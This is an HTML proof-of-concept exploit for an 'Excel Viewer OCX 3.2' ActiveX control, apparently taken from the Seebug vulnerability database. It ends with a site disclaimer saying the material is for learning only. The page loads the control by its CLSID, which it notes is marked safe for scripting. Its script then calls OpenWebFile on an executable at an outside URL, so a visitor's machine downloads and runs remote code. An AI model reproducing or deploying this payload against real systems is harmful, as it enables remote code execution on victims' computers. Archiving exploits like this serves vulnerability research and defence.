<HTML> ---------------------------------------------------------- <br> Excel Viewer OCX 3.2 Remote File execution exploit <br> ---------------------------------------------------------- <br> -----------------------------------<br> # By Mountassif Moad a.k.a Stack # -----------------------------------<br> <!-- v4 Team & evil finger Class EXCEL GUID: {18A295DA-088E-42D1-BE31-5028D7F9B965} Number of Interfaces: 1 Default Interface: _DEXCEL RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False Report for Clsid: {18A295DA-088E-42D1-BE31-5028D7F9B965} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data --> <title>Excel Viewer OCX 3.2 Remote File execution exploit</title> <BODY> <object id=Stack classid="clsid:{18A295DA-088E-42D1-BE31-5028D7F9B965}"></object> <SCRIPT> function Do_it() { File = "http://monmaroc.com/calc.exe" Stack.OpenWebFile(File) } </SCRIPT> <input language=JavaScript onclick=Do_it() type=button value="exploit"> </body> </HTML>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论